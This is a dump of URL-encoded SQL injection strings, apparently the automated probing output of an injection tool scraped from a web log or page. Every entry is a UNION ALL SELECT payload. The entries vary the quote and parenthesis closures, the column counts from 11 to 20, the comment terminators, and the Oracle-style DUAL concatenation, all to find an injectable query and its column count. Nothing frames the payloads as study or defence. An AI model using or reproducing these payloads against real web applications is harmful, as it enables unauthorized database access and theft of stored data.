-7860%22%29%20UNION%20ALL%20SELECT%203430%2C%203430%2C%203430%2C%203430%2C%203430%2C%203430%2C%203430%2C%203430%2C%203430%2C%203430%2C%203430--%20%20AND%20%28%22tLKj%22%20LIKE%20%22tLKj -8296%22%29%20UNION%20ALL%20SELECT%208757%2C%208757%2C%208757%2C%208757%2C%208757%2C%208757%2C%208757%2C%208757%2C%208757%2C%208757%2C%208757%2C%208757--%20%20AND%20%28%22DKGb%22%20LIKE%20%22DKGb -2020%22%29%20UNION%20ALL%20SELECT%201297%2C%201297%2C%201297%2C%201297%2C%201297%2C%201297%2C%201297%2C%201297%2C%201297%2C%201297%2C%201297%2C%201297%2C%201297--%20%20AND%20%28%22GOSV%22%20LIKE%20%22GOSV -2947%22%29%20UNION%20ALL%20SELECT%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959%2C%203959--%20%20AND%20%28%22ufAJ%22%20LIKE%20%22ufAJ -8698%22%29%20UNION%20ALL%20SELECT%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304%2C%201304--%20%20AND%20%28%22BAQu%22%20LIKE%20%22BAQu -9421%22%29%20UNION%20ALL%20SELECT%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979%2C%205979--%20%20AND%20%28%22YNNG%22%20LIKE%20%22YNNG -1442%22%29%20UNION%20ALL%20SELECT%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310%2C%208310--%20%20AND%20%28%22uxXa%22%20LIKE%20%22uxXa -2489%22%29%20UNION%20ALL%20SELECT%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317%2C%207317--%20%20AND%20%28%22itiW%22%20LIKE%20%22itiW -8464%22%29%20UNION%20ALL%20SELECT%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514%2C%204514--%20%20AND%20%28%22InBt%22%20LIKE%20%22InBt -6620%22%29%20UNION%20ALL%20SELECT%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353%2C%202353--%20%20AND%20%28%22FjZo%22%20LIKE%20%22FjZo -6645%22%29%29%20UNION%20ALL%20SELECT%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487%2C%209487--%20%20AND%20%28%28%22mpyd%22%20LIKE%20%22mpyd -9511%22%29%29%20UNION%20ALL%20SELECT%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088%2C%203088--%20%20AND%20%28%28%22EVwE%22%20LIKE%20%22EVwE -3603%22%29%29%20UNION%20ALL%20SELECT%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399%2C%205399--%20%20AND%20%28%28%22NuQg%22%20LIKE%20%22NuQg -2223%22%29%29%20UNION%20ALL%20SELECT%201637%2C%201637%2C%201637%2C%201637%2C%201637%2C%201637%2C%201637%2C%201637%2C%201637%2C%201637%2C%201637%2C%201637%2C%201637%2C%201637--%20%20AND%20%28%28%22TLls%22%20LIKE%20%22TLls -6066%22%29%29%20UNION%20ALL%20SELECT%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880%2C%203880--%20%20AND%20%28%28%22aIFO%22%20LIKE%20%22aIFO -5950%22%29%29%20UNION%20ALL%20SELECT%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546%2C%203546--%20%20AND%20%28%28%22vGgH%22%20LIKE%20%22vGgH -7532%22%29%29%20UNION%20ALL%20SELECT%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592%2C%208592--%20%20AND%20%28%28%22bXYY%22%20LIKE%20%22bXYY -8397%22%29%29%20UNION%20ALL%20SELECT%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603%2C%203603--%20%20AND%20%28%28%22AbqH%22%20LIKE%20%22AbqH -5212%22%29%29%20UNION%20ALL%20SELECT%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814%2C%208814--%20%20AND%20%28%28%22UaQF%22%20LIKE%20%22UaQF -6116%22%29%29%20UNION%20ALL%20SELECT%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152%2C%202152--%20%20AND%20%28%28%22PCbl%22%20LIKE%20%22PCbl -5693%22%29%29%29%20UNION%20ALL%20SELECT%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304%2C%205304--%20%20AND%20%28%28%28%22RKWu%22%20LIKE%20%22RKWu -2294%22%29%29%29%20UNION%20ALL%20SELECT%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422%2C%208422--%20%20AND%20%28%28%28%22wksD%22%20LIKE%20%22wksD -7313%22%29%29%29%20UNION%20ALL%20SELECT%206427%2C%206427%2C%206427%2C%206427%2C%206427%2C%206427%2C%206427%2C%206427%2C%206427%2C%206427%2C%206427%2C%206427%2C%206427--%20%20AND%20%28%28%28%22OkDE%22%20LIKE%20%22OkDE -5867%22%29%29%29%20UNION%20ALL%20SELECT%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973%2C%201973--%20%20AND%20%28%28%28%22PAgX%22%20LIKE%20%22PAgX -3449%22%29%29%29%20UNION%20ALL%20SELECT%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134%2C%205134--%20%20AND%20%28%28%28%22FPDT%22%20LIKE%20%22FPDT -9083%22%29%29%29%20UNION%20ALL%20SELECT%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444%2C%207444--%20%20AND%20%28%28%28%22tmon%22%20LIKE%20%22tmon -4223%22%29%29%29%20UNION%20ALL%20SELECT%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667%2C%207667--%20%20AND%20%28%28%28%22SbFH%22%20LIKE%20%22SbFH -1588%22%29%29%29%20UNION%20ALL%20SELECT%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278--%20%20AND%20%28%28%28%22wmNN%22%20LIKE%20%22wmNN -7408%22%29%29%29%20UNION%20ALL%20SELECT%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985%2C%203985--%20%20AND%20%28%28%28%22EHWF%22%20LIKE%20%22EHWF -6509%22%29%29%29%20UNION%20ALL%20SELECT%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460%2C%203460--%20%20AND%20%28%28%28%22SCmf%22%20LIKE%20%22SCmf -1448%22%20UNION%20ALL%20SELECT%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585%2C%204585--%20%20AND%20%22cDmN%22%20LIKE%20%22cDmN -9592%22%20UNION%20ALL%20SELECT%201064%2C%201064%2C%201064%2C%201064%2C%201064%2C%201064%2C%201064%2C%201064%2C%201064%2C%201064%2C%201064%2C%201064--%20%20AND%20%22SSch%22%20LIKE%20%22SSch -8074%22%20UNION%20ALL%20SELECT%206846%2C%206846%2C%206846%2C%206846%2C%206846%2C%206846%2C%206846%2C%206846%2C%206846%2C%206846%2C%206846%2C%206846%2C%206846--%20%20AND%20%22TUWN%22%20LIKE%20%22TUWN -2425%22%20UNION%20ALL%20SELECT%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105%2C%203105--%20%20AND%20%22GyAp%22%20LIKE%20%22GyAp -6853%22%20UNION%20ALL%20SELECT%205821%2C%205821%2C%205821%2C%205821%2C%205821%2C%205821%2C%205821%2C%205821%2C%205821%2C%205821%2C%205821%2C%205821%2C%205821%2C%205821%2C%205821--%20%20AND%20%22pkej%22%20LIKE%20%22pkej -6590%22%20UNION%20ALL%20SELECT%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567%2C%208567--%20%20AND%20%22OvRn%22%20LIKE%20%22OvRn -9075%22%20UNION%20ALL%20SELECT%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271%2C%203271--%20%20AND%20%22MtPR%22%20LIKE%20%22MtPR -6301%22%20UNION%20ALL%20SELECT%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606%2C%208606--%20%20AND%20%22IrRv%22%20LIKE%20%22IrRv -4631%22%20UNION%20ALL%20SELECT%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226%2C%207226--%20%20AND%20%22Ooed%22%20LIKE%20%22Ooed -4059%22%20UNION%20ALL%20SELECT%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836%2C%202836--%20%20AND%20%22WTHY%22%20LIKE%20%22WTHY -5199%29%20WHERE%202351%3D2351%20UNION%20ALL%20SELECT%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351%2C%202351--%20 -6007%29%20WHERE%209668%3D9668%20UNION%20ALL%20SELECT%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668%2C%209668--%20 -2430%29%20WHERE%204761%3D4761%20UNION%20ALL%20SELECT%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761%2C%204761--%20 -7328%29%20WHERE%203943%3D3943%20UNION%20ALL%20SELECT%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943%2C%203943--%20 -2662%29%20WHERE%208261%3D8261%20UNION%20ALL%20SELECT%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261--%20 -8743%29%20WHERE%204866%3D4866%20UNION%20ALL%20SELECT%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866%2C%204866--%20 -5121%29%20WHERE%206111%3D6111%20UNION%20ALL%20SELECT%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111%2C%206111--%20 -2587%29%20WHERE%208178%3D8178%20UNION%20ALL%20SELECT%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178%2C%208178--%20 -3878%29%20WHERE%203054%3D3054%20UNION%20ALL%20SELECT%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054%2C%203054--%20 -8239%29%20WHERE%207626%3D7626%20UNION%20ALL%20SELECT%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626%2C%207626--%20 -4300%27%29%20WHERE%205831%3D5831%20UNION%20ALL%20SELECT%205831%2C%205831%2C%205831%2C%205831%2C%205831%2C%205831%2C%205831%2C%205831%2C%205831%2C%205831%2C%205831--%20 -6468%27%29%20WHERE%201505%3D1505%20UNION%20ALL%20SELECT%201505%2C%201505%2C%201505%2C%201505%2C%201505%2C%201505%2C%201505%2C%201505%2C%201505%2C%201505%2C%201505%2C%201505--%20 -1250%27%29%20WHERE%202503%3D2503%20UNION%20ALL%20SELECT%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503%2C%202503--%20 -5325%27%29%20WHERE%204409%3D4409%20UNION%20ALL%20SELECT%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409%2C%204409--%20 -9135%27%29%20WHERE%206881%3D6881%20UNION%20ALL%20SELECT%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881%2C%206881--%20 -8140%27%29%20WHERE%203938%3D3938%20UNION%20ALL%20SELECT%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938%2C%203938--%20 -4914%27%29%20WHERE%203704%3D3704%20UNION%20ALL%20SELECT%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704%2C%203704--%20 -6575%27%29%20WHERE%209678%3D9678%20UNION%20ALL%20SELECT%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678%2C%209678--%20 -1247%27%29%20WHERE%205877%3D5877%20UNION%20ALL%20SELECT%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877%2C%205877--%20 -5555%27%29%20WHERE%205705%3D5705%20UNION%20ALL%20SELECT%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705%2C%205705--%20 -2317%27%20WHERE%202661%3D2661%20UNION%20ALL%20SELECT%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661%2C%202661--%20 -1663%27%20WHERE%202785%3D2785%20UNION%20ALL%20SELECT%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785%2C%202785--%20 -8475%27%20WHERE%201370%3D1370%20UNION%20ALL%20SELECT%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370%2C%201370--%20 -7192%27%20WHERE%204784%3D4784%20UNION%20ALL%20SELECT%204784%2C%204784%2C%204784%2C%204784%2C%204784%2C%204784%2C%204784%2C%204784%2C%204784%2C%204784%2C%204784%2C%204784%2C%204784%2C%204784--%20 -2728%27%20WHERE%203296%3D3296%20UNION%20ALL%20SELECT%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296%2C%203296--%20 -3889%27%20WHERE%202096%3D2096%20UNION%20ALL%20SELECT%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096%2C%202096--%20 -1970%27%20WHERE%208176%3D8176%20UNION%20ALL%20SELECT%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176%2C%208176--%20 -5660%27%20WHERE%209934%3D9934%20UNION%20ALL%20SELECT%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934%2C%209934--%20 -3417%27%20WHERE%205637%3D5637%20UNION%20ALL%20SELECT%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637%2C%205637--%20 -2210%27%20WHERE%208195%3D8195%20UNION%20ALL%20SELECT%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195%2C%208195--%20 -7640%22%20WHERE%208777%3D8777%20UNION%20ALL%20SELECT%208777%2C%208777%2C%208777%2C%208777%2C%208777%2C%208777%2C%208777%2C%208777%2C%208777%2C%208777%2C%208777--%20 -1490%22%20WHERE%201373%3D1373%20UNION%20ALL%20SELECT%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373%2C%201373--%20 -8763%22%20WHERE%207783%3D7783%20UNION%20ALL%20SELECT%207783%2C%207783%2C%207783%2C%207783%2C%207783%2C%207783%2C%207783%2C%207783%2C%207783%2C%207783%2C%207783%2C%207783%2C%207783--%20 -3184%22%20WHERE%205729%3D5729%20UNION%20ALL%20SELECT%205729%2C%205729%2C%205729%2C%205729%2C%205729%2C%205729%2C%205729%2C%205729%2C%205729%2C%205729%2C%205729%2C%205729%2C%205729%2C%205729--%20 -2488%22%20WHERE%209602%3D9602%20UNION%20ALL%20SELECT%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602%2C%209602--%20 -5884%22%20WHERE%202361%3D2361%20UNION%20ALL%20SELECT%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361%2C%202361--%20 -2241%22%20WHERE%208820%3D8820%20UNION%20ALL%20SELECT%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820%2C%208820--%20 -1298%22%20WHERE%203417%3D3417%20UNION%20ALL%20SELECT%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417--%20 -1411%22%20WHERE%205172%3D5172%20UNION%20ALL%20SELECT%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172%2C%205172--%20 -6837%22%20WHERE%205524%3D5524%20UNION%20ALL%20SELECT%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524%2C%205524--%20 -3066%27%20%7C%7C%20%28SELECT%203071%20FROM%20DUAL%20WHERE%208003%3D8003%20UNION%20ALL%20SELECT%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003--%20%20%29%20%7C%7C%20%27 -4520%27%20%7C%7C%20%28SELECT%204930%20FROM%20DUAL%20WHERE%207669%3D7669%20UNION%20ALL%20SELECT%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669%2C%207669--%20%20%29%20%7C%7C%20%27 -7087%27%20%7C%7C%20%28SELECT%209657%20FROM%20DUAL%20WHERE%207918%3D7918%20UNION%20ALL%20SELECT%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918%2C%207918--%20%20%29%20%7C%7C%20%27 -3043%27%20%7C%7C%20%28SELECT%206102%20FROM%20DUAL%20WHERE%206005%3D6005%20UNION%20ALL%20SELECT%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005%2C%206005--%20%20%29%20%7C%7C%20%27 -2655%27%20%7C%7C%20%28SELECT%205147%20FROM%20DUAL%20WHERE%205441%3D5441%20UNION%20ALL%20SELECT%205441%2C%205441%2C%205441%2C%205441%2C%205441%2C%205441%2C%205441%2C%205441%2C%205441%2C%205441%2C%205441%2C%205441%2C%205441%2C%205441%2C%205441--%20%20%29%20%7C%7C%20%27 -4928%27%20%7C%7C%20%28SELECT%206374%20FROM%20DUAL%20WHERE%205747%3D5747%20UNION%20ALL%20SELECT%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747%2C%205747--%20%20%29%20%7C%7C%20%27 -5906%27%20%7C%7C%20%28SELECT%203565%20FROM%20DUAL%20WHERE%206940%3D6940%20UNION%20ALL%20SELECT%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940%2C%206940--%20%20%29%20%7C%7C%20%27 -6033%27%20%7C%7C%20%28SELECT%202192%20FROM%20DUAL%20WHERE%206242%3D6242%20UNION%20ALL%20SELECT%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242%2C%206242--%20%20%29%20%7C%7C%20%27 -3529%27%20%7C%7C%20%28SELECT%208219%20FROM%20DUAL%20WHERE%201140%3D1140%20UNION%20ALL%20SELECT%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140%2C%201140--%20%20%29%20%7C%7C%20%27 -3489%27%20%7C%7C%20%28SELECT%206363%20FROM%20DUAL%20WHERE%207622%3D7622%20UNION%20ALL%20SELECT%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622%2C%207622--%20%20%29%20%7C%7C%20%27 -2296%27%20%7C%7C%20%28SELECT%205398%20WHERE%207224%3D7224%20UNION%20ALL%20SELECT%207224%2C%207224%2C%207224%2C%207224%2C%207224%2C%207224%2C%207224%2C%207224%2C%207224%2C%207224%2C%207224--%20%20%29%20%7C%7C%20%27 -4617%27%20%7C%7C%20%28SELECT%207055%20WHERE%203181%3D3181%20UNION%20ALL%20SELECT%203181%2C%203181%2C%203181%2C%203181%2C%203181%2C%203181%2C%203181%2C%203181%2C%203181%2C%203181%2C%203181%2C%203181--%20%20%29%20%7C%7C%20%27 -1285%27%20%7C%7C%20%28SELECT%205469%20WHERE%204216%3D4216%20UNION%20ALL%20SELECT%204216%2C%204216%2C%204216%2C%204216%2C%204216%2C%204216%2C%204216%2C%204216%2C%204216%2C%204216%2C%204216%2C%204216%2C%204216--%20%20%29%20%7C%7C%20%27 -3288%27%20%7C%7C%20%28SELECT%206867%20WHERE%205766%3D5766%20UNION%20ALL%20SELECT%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766%2C%205766--%20%20%29%20%7C%7C%20%27 -7664%27%20%7C%7C%20%28SELECT%203489%20WHERE%201485%3D1485%20UNION%20ALL%20SELECT%201485%2C%201485%2C%201485%2C%201485%2C%201485%2C%201485%2C%201485%2C%201485%2C%201485%2C%201485%2C%201485%2C%201485%2C%201485%2C%201485%2C%201485--%20%20%29%20%7C%7C%20%27 -7198%27%20%7C%7C%20%28SELECT%202750%20WHERE%203605%3D3605%20UNION%20ALL%20SELECT%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605%2C%203605--%20%20%29%20%7C%7C%20%27 -7786%27%20%7C%7C%20%28SELECT%203740%20WHERE%201180%3D1180%20UNION%20ALL%20SELECT%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180%2C%201180--%20%20%29%20%7C%7C%20%27 -9395%27%20%7C%7C%20%28SELECT%209845%20WHERE%208106%3D8106%20UNION%20ALL%20SELECT%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106%2C%208106--%20%20%29%20%7C%7C%20%27 -9397%27%20%7C%7C%20%28SELECT%201316%20WHERE%202752%3D2752%20UNION%20ALL%20SELECT%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752%2C%202752--%20%20%29%20%7C%7C%20%27 -6515%27%20%7C%7C%20%28SELECT%208157%20WHERE%203921%3D3921%20UNION%20ALL%20SELECT%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921%2C%203921--%20%20%29%20%7C%7C%20%27 -8851%20%2B%20%28SELECT%201815%20FROM%20DUAL%20WHERE%201787%3D1787%20UNION%20ALL%20SELECT%201787%2C%201787%2C%201787%2C%201787%2C%201787%2C%201787%2C%201787%2C%201787%2C%201787%2C%201787%2C%201787--%20%20%29 -5094%20%2B%20%28SELECT%201403%20FROM%20DUAL%20WHERE%208600%3D8600%20UNION%20ALL%20SELECT%208600%2C%208600%2C%208600%2C%208600%2C%208600%2C%208600%2C%208600%2C%208600%2C%208600%2C%208600%2C%208600%2C%208600--%20%20%29 -2038%20%2B%20%28SELECT%209984%20FROM%20DUAL%20WHERE%206775%3D6775%20UNION%20ALL%20SELECT%206775%2C%206775%2C%206775%2C%206775%2C%206775%2C%206775%2C%206775%2C%206775%2C%206775%2C%206775%2C%206775%2C%206775%2C%206775--%20%20%29 